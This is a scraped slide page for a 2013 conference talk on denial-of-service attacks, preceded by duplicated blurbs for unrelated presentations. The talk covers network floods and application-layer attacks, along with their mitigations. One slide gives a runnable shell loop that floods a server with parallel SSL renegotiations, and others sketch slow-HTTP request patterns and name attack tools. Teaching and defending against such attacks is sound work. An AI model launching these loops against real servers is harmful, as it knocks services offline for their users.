The document discusses denial-of-service (DoS) attacks and their targets at different layers of the OSI model. Layer 3 attacks target bandwidth consumption through techniques like ping floods and SYN floods. Layer 7 attacks target application resources through vectors like SSL handshake renegotiation to cause intense CPU usage on the server. The document outlines how Layer 7 attacks are more stealthy and efficient at causing damage than Layer 3 attacks.
This is my presentation held at Vale Security Conference on September 14th 2013 about multiplexing attacks through TOR exit-nodes and SOCKS/HTTPs proxies
Slides for the presentation about SCADA hacking given on Hackers 2 Hackers Conference 10th edition at São Paulo, Brazil
Demo videos:
- Wago 0day DOS: https://www.youtube.com/watch?v=ACMJmXy4hSg
- Modbus Replay: https://www.youtube.com/watch?v=1pfZDiUUQHQ
Presentation Video (pt_BR)
- https://www.youtube.com/watch?v=R1snsQ_WS9Y
Reducing attack surface on ICS with Windows native solutionsJan Seidl
Presentation given at 4SICS conference in Stockholm, Sweden about using Windows built-in solutions like Software Restriciton Policies/App Locker, EMET and other minor things.
As seen with the IoT-based MIRAI botnet, security vulnerabilities can have their root cause several layers down in the supply chain. The session will corroborate this with concrete vulnerability results of over 5,000 IoT software packages. It also will show how, to stop this bug passing, developers, integrators and regulating bodies need to work together to build a trustworthy IoT software supply chain.
Presented by: Chris Sistrunk, Entergy
Abstract: IT folks have been doing it for years – building labs to test new products before rolling them out – but the concept is still rather revolutionary to most practitioners of SCADA security. Yet the benefits of a lab are many, including training staff and solving real-world problems by replicating and attacking them in the relatively low-risk lab environment.
But how do you pitch this (not inexpensive) idea in a way that gets organizational buy-in? And if your organization is just too small, what are the factors to considering when using a third-party lab? Hear ideas and ask questions of someone who evolved his organization’s capabilities from one small lab to five complete labs.
This is my presentation held at Vale Security Conference on September 14th 2013 about multiplexing attacks through TOR exit-nodes and SOCKS/HTTPs proxies
Slides for the presentation about SCADA hacking given on Hackers 2 Hackers Conference 10th edition at São Paulo, Brazil
Demo videos:
- Wago 0day DOS: https://www.youtube.com/watch?v=ACMJmXy4hSg
- Modbus Replay: https://www.youtube.com/watch?v=1pfZDiUUQHQ
Presentation Video (pt_BR)
- https://www.youtube.com/watch?v=R1snsQ_WS9Y
Reducing attack surface on ICS with Windows native solutionsJan Seidl
Presentation given at 4SICS conference in Stockholm, Sweden about using Windows built-in solutions like Software Restriciton Policies/App Locker, EMET and other minor things.
As seen with the IoT-based MIRAI botnet, security vulnerabilities can have their root cause several layers down in the supply chain. The session will corroborate this with concrete vulnerability results of over 5,000 IoT software packages. It also will show how, to stop this bug passing, developers, integrators and regulating bodies need to work together to build a trustworthy IoT software supply chain.
Presented by: Chris Sistrunk, Entergy
Abstract: IT folks have been doing it for years – building labs to test new products before rolling them out – but the concept is still rather revolutionary to most practitioners of SCADA security. Yet the benefits of a lab are many, including training staff and solving real-world problems by replicating and attacking them in the relatively low-risk lab environment.
But how do you pitch this (not inexpensive) idea in a way that gets organizational buy-in? And if your organization is just too small, what are the factors to considering when using a third-party lab? Hear ideas and ask questions of someone who evolved his organization’s capabilities from one small lab to five complete labs.
In the Line of Fire-the Morphology of Cyber AttacksRadware
Dennis Ulse's Presentation from SecureWorld Expo Atlanta that discusses Availability-based threats; Attacks on U.S. banks and other popular attack patterns and trends.
In the Line of Fire - The Morphology of Cyber-AttacksRadware
Presentation from Dennis Usle during TakeDownCon in Huntsville, AL that discusses Availability-based threats; Attacks on U.S. banks and others popular attack patterns & trends.
From his series of presentations during SecureWorld and also the iTech 2013 Conference, Radware Attack Mitigation Specialist David Hobbs presents “Survival in an Evolving Threat Landscape.” The discussion covers availability-based threats, attacks on the U.S. banks and others popular patterns & trends.
SecureWorld St. Louis: Survival in an Evolving Threat LandscapeRadware
David Hobbs’ presentation from SecureWorld Expo - St. Louis discusses availability-based threats; attacks on U.S. banks and other popular attack patterns & trends.
In the Line of Fire-the Morphology of Cyber AttacksRadware
David Hobbs’ Presentation from his series of presentations during SecureWorld that discusses Availability-based threats; Attacks on U.S. banks and others popular attack patterns & trends.
An Inside Look at a Sophisticated, Multi-vector DDoS AttackImperva
This presentation explores the current DDoS attack landscape, it covers the basics of DDoS attacks, current trends including the most recent results from the newly published 2015 Imperva Incapsula DDoS Report. It also discusses a detailed analysis of one of today’s modern, multi-vector DDoS attacks. While dissecting this DDoS attack, this presentation explores the anatomy and timeline of the attack, as well as the steps used to mitigate each phase of the assault. This session will close with a review of the aspects of effective DDoS protection solutions used to combat these sophisticated denial of service attacks.
Philippines Cybersecurity Conference 2021: The role of CERTsAPNIC
APNIC Senior Security Specialist Adli Wahid spoke on the importance and role of CERTs in helping prevent cyber attacks at the Philippines Cybersecurity Conference 2021, held online from 13 to 29 October 2021.
The security experts from Cloudflare and WP Engine help you navigate the security landscape for your web infrastructure.
Register to watch the on-demand webinar: https://hs.wpengine.com/webinar-securing-web-infrastructure
An Inside Look at a Sophisticated Multi-Vector DDoS AttackImperva Incapsula
By Nabeel Saeed
This presentation explores the current DDoS attack landscape, it covers the basics of DDoS attacks, current trends including the most recent results from the newly published 2015 Imperva Incapsula DDoS Report. It also discusses a detailed analysis of one of today’s modern, multi-vector DDoS attacks. While dissecting this DDoS attack, this presentation explores the anatomy and timeline of the attack, as well as the steps used to mitigate each phase of the assault. This session will close with a review of the aspects of effective DDoS protection solutions used to combat these sophisticated denial of service attacks.
[Guest lecturer]
Place: University of Twente
Course: Product Design to Online Business (Module 7)
Audience: students of industrial engineering (Technische Bedrijfskunde - TBK) and business information technology (BIT)
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
In the Line of Fire-the Morphology of Cyber AttacksRadware
Dennis Ulse's Presentation from SecureWorld Expo Atlanta that discusses Availability-based threats; Attacks on U.S. banks and other popular attack patterns and trends.
In the Line of Fire - The Morphology of Cyber-AttacksRadware
Presentation from Dennis Usle during TakeDownCon in Huntsville, AL that discusses Availability-based threats; Attacks on U.S. banks and others popular attack patterns & trends.
From his series of presentations during SecureWorld and also the iTech 2013 Conference, Radware Attack Mitigation Specialist David Hobbs presents “Survival in an Evolving Threat Landscape.” The discussion covers availability-based threats, attacks on the U.S. banks and others popular patterns & trends.
SecureWorld St. Louis: Survival in an Evolving Threat LandscapeRadware
David Hobbs’ presentation from SecureWorld Expo - St. Louis discusses availability-based threats; attacks on U.S. banks and other popular attack patterns & trends.
In the Line of Fire-the Morphology of Cyber AttacksRadware
David Hobbs’ Presentation from his series of presentations during SecureWorld that discusses Availability-based threats; Attacks on U.S. banks and others popular attack patterns & trends.
An Inside Look at a Sophisticated, Multi-vector DDoS AttackImperva
This presentation explores the current DDoS attack landscape, it covers the basics of DDoS attacks, current trends including the most recent results from the newly published 2015 Imperva Incapsula DDoS Report. It also discusses a detailed analysis of one of today’s modern, multi-vector DDoS attacks. While dissecting this DDoS attack, this presentation explores the anatomy and timeline of the attack, as well as the steps used to mitigate each phase of the assault. This session will close with a review of the aspects of effective DDoS protection solutions used to combat these sophisticated denial of service attacks.
Philippines Cybersecurity Conference 2021: The role of CERTsAPNIC
APNIC Senior Security Specialist Adli Wahid spoke on the importance and role of CERTs in helping prevent cyber attacks at the Philippines Cybersecurity Conference 2021, held online from 13 to 29 October 2021.
The security experts from Cloudflare and WP Engine help you navigate the security landscape for your web infrastructure.
Register to watch the on-demand webinar: https://hs.wpengine.com/webinar-securing-web-infrastructure
An Inside Look at a Sophisticated Multi-Vector DDoS AttackImperva Incapsula
By Nabeel Saeed
This presentation explores the current DDoS attack landscape, it covers the basics of DDoS attacks, current trends including the most recent results from the newly published 2015 Imperva Incapsula DDoS Report. It also discusses a detailed analysis of one of today’s modern, multi-vector DDoS attacks. While dissecting this DDoS attack, this presentation explores the anatomy and timeline of the attack, as well as the steps used to mitigate each phase of the assault. This session will close with a review of the aspects of effective DDoS protection solutions used to combat these sophisticated denial of service attacks.
[Guest lecturer]
Place: University of Twente
Course: Product Design to Online Business (Module 7)
Audience: students of industrial engineering (Technische Bedrijfskunde - TBK) and business information technology (BIT)
Similar to Super Effective Denial of Service Attacks (20)
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
2. $ whoami
Full Name: Jan
Origin: Rio de
Seidl
Janeiro, RJ – Brazil
Work:
● Technical Coordinator @ TI Safe
●
● OpenSource contributor for: PEV, Logstash
●
● Codes and snippets @ github.com/jseidl
●
Features:
● UNIX Evangelist/Addict/Freak (but no fanboy!)
●
● Python and C lover
●
● Coffee dependent
●
● Hates printers and social networks
●
● Proud DC Labs Member
●
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
3. agenda
0x0
0x1
0x2
0x3
0x4
0x5
0x6
0x7
0x8
0x9
0xA
Introduction to Denial-of-Service
Background: Layer 3 attacks
Attacking Layer 7: Fundamentals
Attacking Layer 7: Vectors & Tools
WebServer DoS Mitigation 101
Proxies (SOCKS/TOR) and Layer 7 attacks
Jericho Attack Technique: Load-balancing attacks
XSS D/DoS
Size doesn't matter: Mobile-launched Denial-of-Service
Demo/Video: GoldenEye MdoS Android Tool
Questions?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
4. Introduction to Denial-of-Service
What is denial of service?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
5. Introduction to Denial-of-Service
What is denial of service?
A denial-of-service attack (...), is an attempt to
make a machine or network resource
unavailable to its intended users.
Source: Wikipedia/en_US
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
6. Introduction to Denial-of-Service
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
7. Introduction to Denial-of-Service
Result?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
8. Introduction to Denial-of-Service
Result?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
9. Introduction to Denial-of-Service
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
10. Introduction to Denial-of-Service
Symptoms
Oddly low performance
Unavailability of given resource
Unavailability of all resources
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
11. Introduction to Denial-of-Service
Recent Cases
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
13. Introduction to Denial-of-Service
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
18. Introduction to Denial-of-Service
Targets (OSI layer)
Network (Layer 3)
Bandwidth consumption
Application (Layer 7)
Application or operating system resources consumption
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
19. Introduction to Denial-of-Service
Network (Layer 3)
Bandwidth consumption
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
20. Background: Layer 3 attacks
Popular Attacks
Ping Flood
(…) is a simple denial-of-service attack where the attacker
overwhelms the victim with ICMP Echo Request (ping)
packets (...) The attacker hopes that the victim will respond
with ICMP Echo Reply packets, thus consuming both
outgoing bandwidth as well as incoming bandwidth.
Source: Wikipedia/en_US
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
21. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
22. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
23. Background: Layer 3 attacks
Popular Attacks
Smurf Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
24. Background: Layer 3 attacks
Popular Attacks
SYN Flood
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
25. Background: Layer 3 attacks
Popular Attacks
SYN Flood
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
26. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
“When the sum of the offset and size of one fragmented
packet differ from that of the next fragmented packet, the
packets overlap, and the server attempting to reassemble
the packet can crash, especially if it is running an older
operating system that has this vulnerability.”
http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
27. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
28. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
29. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
30. Background: Layer 3 attacks
Popular Attacks
Teardrop Attack
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
31. Attacking Layer 7: Fundamentals
Application (Layer 7)
Application or operating system resources consumption
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
32. Attacking Layer 7: Fundamentals
Focus
Layer 3
Layer 7
Exhaust
bandwidth
Exhaust application or
operating system keyresources
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
33. Attacking Layer 7: Fundamentals
Stealthness
Layer 3
Layer 7
High network noise
(noisy attack)
Low network noise, might
emulate legit requests
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
34. Attacking Layer 7: Fundamentals
Efficiency
Layer 3
Layer 7
Requires lot of participants
for significant outage. May
be blocking by sparring
Sometimes only one
machine can cause damage.
Difficult to block
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
35. Attacking Layer 7: Fundamentals
Mitigation
Layer 3
Layer 7
Large link, connectionlimiting, rate-limiting,
sparring
?
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
36. Attacking Layer 7: Fundamentals
Layer 7 attacks targets
Intense CPU, Disk I/O & Swapping operations,
long/slow/complex queries
Finite application resources: Maximum Sockets Limits, Maximum
Memory Limits, Disk space etc
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
37. Attacking Layer 7: Vectors & Tools
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
38. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
15% more processing power needed on server
than on client to establish handshake.
On the wild since 2003.
Still affects most implementations.
Found by THC group (ww.thc.org) in 2011
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
39. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Tool:
THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/>
- or thcssldosit() { while :; do (while :; do echo R;
done) | openssl s_client connect 127.0.0.1:443
2>/dev/null; done }
for x in `seq 1 100`; do thcssldosit & done
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
40. Attacking Layer 7: Vectors & Tools
Intense CPU usage
SSL Renegotiation / SSL Handshake Attack
Affects any TLS/SSL secured protocol:
HTTPS, SMTPS, POP3S, Database secure ports etc
Mitigation?
Turning off SSL renegotiation might help, but not solve
SSL accelerators might help, but also don't 100% solve
IPTables mitigation
http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
41. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Parallel requests of small GZIP'ed content parts
Forces the webserver to perform several parallel compression
operations = high load
Discovered in 2011 (CVE-2011-3192)
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
42. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Tools:
killapache.pl <
http://seclists.org/fulldisclosure/2011/Aug/175>
Slowhttptest <http://code.google.com/p/slowhttptest/>
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
43. Attacking Layer 7: Vectors & Tools
Intense CPU usage
Apache Range Header Attack
Mitigation:
SetEnvIf or mod_rewrite
(ref: http://httpd.apache.org/security/CVE-2011-3192.txt)
Use a WAF (Web Application Firewall)
Update Apache to version 2.2.21 or greater
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
44. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers, Slow Post, Slow Read
Read or send data in small chunks, with interval
between reads / writes.
Waiting for the full request is part of the Web Server's
nature
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
45. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
Slow Post: send request post body (post data) 'Slowly'
Slow Read: Small TCP window size to force slow response
reading
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
46. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
GET / HTTP/1.1 rn /* sleep(1) */
Connection: keep-alive rn /* sleep(1) */
...
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
47. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Post: send request post body (post data) 'Slowly'
Content-Type: application/x-www-form-urlencoded
Content-Length: 512
Accept: text/html;q=0.9,text/plain;q=0.8
foo=bar /* sleep(1) */
bar=baz /* sleep(1) */
baz=foo /* sleep(1) */
...
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
48. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Slow Read: Small TCP window size to force slow response
reading
/* pseudocode */
int len = 1;
while (data = read(sock, buffer, len)) {
sleep(5);
…
}
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
49. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks
Tools:
Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post
Tool
Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool
Slow Read: slowhttptest
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil
Latinoware/2013 – Foz do Iguaçú, Brazil
50. Attacking Layer 7: Vectors & Tools
Connection slots abuse
HTTP Slow Attacks - Mitigation:
Slow Headers: request timeout (apache's
mod_reqtimeout), WAF
Slow Post: request timeout, WAF
Slow Read: Disable pipelining and oddly slow window sizes,
limit maximum request request time, WAF
